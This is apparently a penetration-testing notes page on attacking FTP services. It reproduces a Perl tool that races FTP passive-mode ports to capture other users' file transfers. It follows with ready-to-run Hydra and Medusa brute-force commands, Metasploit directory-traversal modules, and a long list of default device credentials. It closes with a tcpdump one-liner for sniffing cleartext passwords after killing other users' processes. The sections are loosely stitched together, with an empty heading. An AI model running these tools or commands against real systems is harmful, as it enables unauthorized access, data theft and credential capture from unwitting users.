Passive Aggression v1.0

Exploits FTP servers using passive mode to transfer data.

#!/usr/bin/perl
###############
#
# Passive Aggression v1.0
#
# Exploits FTP servers using passive mode to transfer data.
# 
# Usage:  ./pasvagg.pl ftp.cdrom.com anonymous h4x0r@hotmail.com
#
# Copyright (C) 2000 H.D. Moore <hdm@digitaloffense.net>
#
# https://www.digitaloffense.net/
#
##

use IO::Socket;
use IO::Select;

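# Print the command-line synopsis to STDOUT and exit with exit(-1)
# (reported as 255 on POSIX shells).
#
# Only the hostname is mandatory: MAIN calls usage() when it is missing and
# substitutes defaults for a missing username or password, so those two are
# the optional arguments and the brackets in the message reflect that.
sub usage {
    print "Usage: $0 <hostname> [username] [password]\n";
    exit(-1);
}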

# Probe one candidate data port on $host (a package global set in MAIN).
#
# Opens a TCP connection to $host:$port; if the connect fails the sub returns
# silently.  On success it fork()s: the parent returns at once so the caller
# can move on to the next port, and the child decides whether the far end is
# sending data (a "reader" in this file's vocabulary) or sitting idle (what
# the code calls a "?writer?"), then exit()s.  Data received by the child is
# written to "$host-$port.dmp" in the current directory.
#
# NOTE(review): fork() returns undef on failure, and undef takes the else
# branch below, so a failed fork runs the child path inside the parent and
# ends with exit -- the control process itself would terminate.
sub scanport {
    my ($port) = @_;
    my $s;
    
    $s = IO::Socket::INET->new (        PeerAddr    => $host,
                                        PeerPort    => $port,
                                        Proto       => "tcp",
                                        Type        => SOCK_STREAM
                                    ) || return;
    if (fork())
    {
        return;
    } else {
        # Everything below runs in the child.  These are package globals
        # (no my); the child assigns its own copies after the fork.
        $bytes = 0;
        $reader = 0;
        $SIG{'INT'} = 'IGNORE';     # child ignores SIGINT; it exits on its own below
        $filename = "$host-$port.dmp";
        
        my $sel = IO::Select->new();
        $sel->add($s);
        
        # Wait up to 5 s for the peer to send something.  Only $s is in the
        # set, so @ready holds at most that one handle.
        @ready = $sel->can_read(5);
        foreach $fh (@ready)
        {
            $data = <$fh>;
            # <$fh> returns undef at EOF; length(undef) compares equal to 0,
            # so a closed connection is skipped the same way as an empty line.
            if (length($data) == 0) { next; }
            $bytes += length($data);
            print "\n:: reader ".length($data)." found on $host:$port\n";
            $reader++;
            # The dump file is only created once data has actually arrived.
            # NOTE(review): two-argument open with a bareword handle; $filename
            # is derived from the command-line $host, so the three-argument
            # form (open my $dmp, '>', $filename) would rule out mode
            # injection through that argument.
            open (DMP, ">".$filename) || die "could not create dump file:  $!";
            print DMP $data;
            # NOTE(review): remove() is called with no handle argument here;
            # presumably $sel->remove($fh) was intended.
            $sel->remove if eof($fh);
        }

        
        if ($reader)
        {
            # Rename the process (as shown by ps) and copy the rest of the
            # stream into the dump file, counting bytes as we go.
            $0 = "PASV Aggression: downloading from $host:$port";
            while ($line = <$s>)
            {
                $bytes += length($line);
                print DMP $line;
            }
            close(DMP);
            print "\n:: finished transfer of $bytes bytes from $host:$port\n";
        } else {
           # Nothing arrived within the timeout; the code reports the
           # connection as a "?writer?" and sends it a single marker line.
           print "\n:: ?writer? found on port $port\n"; 
           print $s "REAPER\r\n";
        }
        close($s);

        exit;
    } 
}

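# Read one reply line from the control connection and strip the trailing
# newline (chomp only, so a CR from a CRLF line is echoed as before).
#
# If the peer has closed the connection (<$socket> returns undef) the sub
# reports it and exits; the previous version chomp()ed undef and re-read
# undef forever inside the reply loops, hanging the whole tool.
sub _read_reply {
    my ($socket) = @_;
    my $line = <$socket>;
    if (!defined $line) {
        print ":: ERROR: connection closed by server\n";
        close($socket);
        exit;
    }
    chomp($line);
    return $line;
}

# Consume reply lines until one matches $want, echoing each line as ">> ".
#
# Lines matching $bad are treated as a fatal server error: they are printed
# under ":: ERROR:" and the program exits.  Looping (rather than checking a
# single line) is what lets multi-line replies such as "220-" banners or
# informational lines go past without breaking the login sequence.
#
# Returns the matching reply line.
sub _await_reply {
    my ($socket, $want, $bad) = @_;
    my $reply = _read_reply($socket);
    while ($reply !~ $want) {
        if ($reply =~ $bad) {
            print ":: ERROR:\n";
            print ">> $reply\n";
            exit;
        }
        print ">> $reply\n";
        $reply = _read_reply($socket);
    }
    print ">> $reply\n";
    return $reply;
}

# Authenticate on the FTP control connection and switch it to passive mode.
#
# Sequence: expect a 220 greeting, send USER $username and wait for 331,
# send PASS $password and wait for 230, send PASV and wait for 227.
# $username and $password are package globals set in MAIN; the last reply
# line is left in the package global $response as before.  Any unexpected
# reply (or a dropped connection) prints a diagnostic and exit()s -- this
# sub never returns a failure to its caller.
sub LoginToServer {
    my ($socket) = @_;

    # Greeting must be 220; anything else means this is not an FTP control
    # port that is willing to talk to us, so give up immediately.
    $response = _read_reply($socket);
    if ($response !~ m/^220/)
    {
        print "server gave us a bad response:  $response\n";
        close($socket);
        exit;
    }
    print ">> $response\n";
    print ":: logging into server as $username.\n";

    # USER: only a 5xx reply is fatal; 2xx/3xx/4xx lines are echoed and skipped.
    print $socket "USER $username\r\n";
    $response = _await_reply($socket, qr/^331/, qr/^5/);

    # PASS and PASV: anything that is not a 2xx reply is fatal.
    print $socket "PASS $password\r\n";
    $response = _await_reply($socket, qr/^230/, qr/^(?!2)/);

    print $socket "PASV\r\n";
    $response = _await_reply($socket, qr/^227/, qr/^(?!2)/);
    print ":: server ready for passive attack\n";
}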

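# Ask the server for a fresh passive-mode data port and return it as a number.
#
# Sends PASV on the control connection and parses the 227 reply, whose
# payload is "(h1,h2,h3,h4,p1,p2)" per RFC 959.  The advertised address is
# stored in the package global $ip (kept for compatibility; nothing in this
# file reads it) and the reply line in the package global $response.  The
# port is p1*256+p2 using only the low eight bits of each field, the same
# arithmetic as DecodePort().
#
# Returns nothing (undef in scalar context) if the connection has closed or
# the reply does not contain six comma-separated numbers, instead of reusing
# a stale $1 from an earlier match as the previous version did.
sub GetCurrentPort {
    my ($socket) = @_;

    print $socket "PASV\r\n";
    $response = <$socket>;
    return if !defined $response;          # peer closed the control connection
    chomp($response);

    # Six decimal fields after an opening paren; whitespace around commas is
    # tolerated, a closing paren is not required (the old parser did not need
    # one either).
    my @fields = $response =~ m{
        \(
        \s* (\d+) \s* , \s* (\d+) \s* , \s* (\d+) \s* , \s* (\d+)   # h1..h4
        \s* , \s* (\d+) \s* , \s* (\d+)                              # p1, p2
    }x;
    if (@fields != 6) {
        print ":: could not parse PASV reply: $response\n";
        return;
    }

    my ($p1, $p2) = @fields[4, 5];
    $ip = join(".", @fields[0 .. 3]);
    return (($p1 & 0xFF) << 8) | ($p2 & 0xFF);
}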

# Turn the two port fields of a PASV reply into a port number.
#
# $high is the p1 field (weighted by 256) and $low the p2 field.  Only the
# low eight bits of each argument count, so values above 255 are reduced
# modulo 256 rather than spilling into the other byte.
sub DecodePort {
    my ($high, $low) = @_;
    my $port = ($high & 0xFF) * 256;
    $port += ($low & 0xFF);
    return $port;
}

###################
#      MAIN       #
###################

# Command line: hostname is required (usage() exits if it is missing);
# username and password default to a typical anonymous login.  All three are
# package globals read by the subs above.
$host = shift() || usage();
$username = shift() || "anonymous";
$password = shift() || "mozilla\@";


$| = 1;                     # unbuffered STDOUT so the "\r" status lines appear promptly
@PortSample = ();           # PASV ports observed during the sampling phase
$CmdLatency = 0;            # accumulated wall-clock seconds spent in GetCurrentPort()
$now = 0;
$0 = "PASV Aggression: control process";   # name shown by ps for this process

# Control connection to the FTP service; die (no retry) if it cannot be opened.
$socket = IO::Socket::INET->new (   PeerAddr    => $host,
                                    PeerPort    => 21,
                                    Proto       => "tcp",
                                    Type        => SOCK_STREAM
                                ) || die "could not connect to server:  $!";       
print ":: connected to $host\n";
LoginToServer($socket);



# Sampling phase: issue PASV ten times, one second apart, recording the port
# the server hands out each time and how long each round trip took.
print ":: sampling passive port selection\n";
for ($cnt = 0; $cnt < 10; $cnt ++)
{
    $now = time();
    $PortSample[$cnt] = GetCurrentPort($socket);
    $CmdLatency += time() - $now;
    sleep(1);
}
# Ports per second between the first and last sample; the first branch handles
# the port counter having wrapped during the ten seconds.
if ($PortSample[0] > $PortSample[9])
{
    $rate = (($PortSample[9] + 65535) - $PortSample[0]) / 10;   
} else {
    $rate = (($PortSample[9]) - $PortSample[0]) / 10;
}
$latency = $CmdLatency / 10;   # mean seconds per PASV round trip

print ":: passive connection rate = $rate/sec\n";
print ":: passive command latency = $latency seconds\n";
print ":: starting the reaper engine\n\n";

# Main loop; it never exits on its own.  Each pass asks for a fresh PASV
# port, adds the expected drift (rate * latency), and hands the next 15 ports
# to scanport(), which forks one child per successful connect.
# NOTE(review): there is no wait()/waitpid() anywhere in this file, so exited
# children remain as zombies until this control process terminates.
while (1)
{
    $start = sprintf("%d", ($rate * $latency) + GetCurrentPort($socket));
    print "\r                                             ";   # blank the status line
    print "\r:: starting port $start\n";
    for ($port = $start; $port < $start + 15; $port++)
    {
        print "\r                                             ";
        print "\r:: scanning port ($port)";
        scanport($port);
    }
}
FTP (21)

Enumeration

Banner Grabbing

telnet 10.10.10.10 21

Anonymous Access

ftp 10.10.10.10

Username: anonymous OR anon

Password: any

Bruteforce

Hydra

hydra -t 1 -l admin -P ~/password-list.txt -vV 10.10.10.10 ftp

Medusa

medusa -h 10.10.10.10 -u admin -P ~/password-list.txt -M ftp

MiTM

https://labs.p64cyber.com/passive-aggression-v1-0/null

FTP Fuzzing

A Metasploit module that will connect to an FTP server and perform pre and post-authentication fuzzing. – Suggested by @_tmap

use auxiliary/fuzzers/ftp/ftp_pre_post

Metasploit

Anonymous FTP Access Detection

Detect anonymous (read/write) FTP server access.

use auxiliary/scanner/ftp/anonymous

BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure

This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as ‘..//.’

use auxiliary/scanner/ftp/bison_ftp_traversal

ColoradoFTP Server 1.3 Build 8 Directory Traversal Information Disclosure

use auxiliary/scanner/ftp/colorado_ftp_traversal

This module exploits a directory traversal vulnerability found in ColoradoFTP server version <= 1.3 Build 8. This vulnerability allows an attacker to download and upload arbitrary files from the server by crafting GET/PUT commands that include file system traversal strings starting with ‘\’. The server is written in Java and therefore platform independent, however this vulnerability is only exploitable on the Windows version.

Easy File Sharing FTP Server 3.6 Directory Traversal

use auxiliary/scanner/ftp/easy_file_sharing_ftp

This module exploits a directory traversal vulnerability found in Easy File Sharing FTP Server Version 3.6 and Earlier. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as ‘../’

Authentication Scanner

This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/ftp/ftp_login

Version Scanner

Detect FTP Version.

use auxiliary/scanner/ftp/ftp_version

Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure

This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as ‘..//’

use auxiliary/scanner/ftp/konica_ftp_traversal

PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure

This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as ‘..//’

use auxiliary/scanner/ftp/pcman_ftp_traversal 

Titan FTP XCRC Directory Traversal Information Disclosure

This module exploits a directory traversal vulnerability in the XCRC command implemented in versions of Titan FTP up to and including 8.10.1125. By sending multiple XCRC commands, it is possible to disclose the contents of any file on the drive with a simple CRC “brute force” attack. Although the daemon runs with SYSTEM privileges, access is limited to files that reside on the same drive as the FTP server’s root directory.

use auxiliary/scanner/ftp/titanftp_xcrc_traversal

FTP Configuration Files

Nix

/etc/vsftpd/vsftpd.conf
/etc/apache2/mods-available/proxy_ftp.conf
apt-ftparchive.conf
ftp-archive.conf

Windows

ApplicationHost.config

Default Username/Passwords

anonymous:anonymous
root:rootpasswd
root:12hrs37
ftp:b1uRR3
admin:admin
localadmin:localadmin
admin:1234
apc:apc
admin:nas
Root:wago 
Admin:wago 
User:user 
Guest:guest 
ftp:ftp
admin:password
a:avery
admin:123456
adtec:none
admin:admin12345
none:dpstelecom
instrument:instrument
user:password
root:password
default:default
admin:default
nmt:1234
admin:Janitza
supervisor:supervisor
user1:pass1
avery:avery
IEIeMerge:eMerge
ADMIN:12345
beijer:beijer
Admin:admin
admin:1234
admin:1111
root:admin
se:1234
admin:stingray
device:apc
apc:apc
dm:ftp
dmftp:ftp
httpadmin:fhttpadmin
user:system
MELSEC:MELSEC
QNUDECPU:QNUDECPU
ftp_boot:ftp_boot
uploader:ZYPCOM
ftpuser:password
USER:USER
qbf77101:hexakisoctahedron
ntpupdate:ntpupdate
sysdiag:factorycast@schneider
wsupgrade:wsupgrade
pcfactory:pcfactory
loader:fwdownload
test:testingpw
webserver:webpages
fdrusers:sresurdf
nic2212:poiuypoiuy
user:user00
su:ko2003wa
MayGion:maygion.com
admin:9999
PlcmSpIp:PlcmSpIp

Searchsploit Results

tcpdump, a digital predator capable of giving low-level hackers god-like powers

TCP Dump

tcpdump is a powerful command-line packet analyzer, and libpcap is a portable C/C++ library for network traffic capture.

Why do We Care?

Passive Eavesdropping. Low priv user escalation.

About Passive Eavesdropping

  • Kill process and make them re-auth
  • Listen for clear text credentials
  • Find new hosts and endpoints
  • Surveillance

Pentests

One of my favourite things to do on tests is to kill processes I know other users/admins are using that auth using protocols I can either downgrade or see in plaintext, this method is highly effective as the user will have to re-auth giving you the credentials you need. I can’t tell you how many times I have priv. esc’d with only tcpdump.

Example:

Here we sniff traffic as low-level user, open in Wireshark, follow TCP stream and voila, we have password 🙂

DC info and password masked as this example is taken from an active CTF style box.

Tactical Command

tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B5 -A5

One of my favourite things to do on tests is to kill processes I know other users/admins are using that auth using protocols I can either downgrade or see in plaintext; this method is highly effective as the user will have to re-auth, giving you the credentials you need.

oracle@box#: ps
1392 process-to-kill
oracle@box#: kill -9 1392
oracle@box#: tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B5 -A5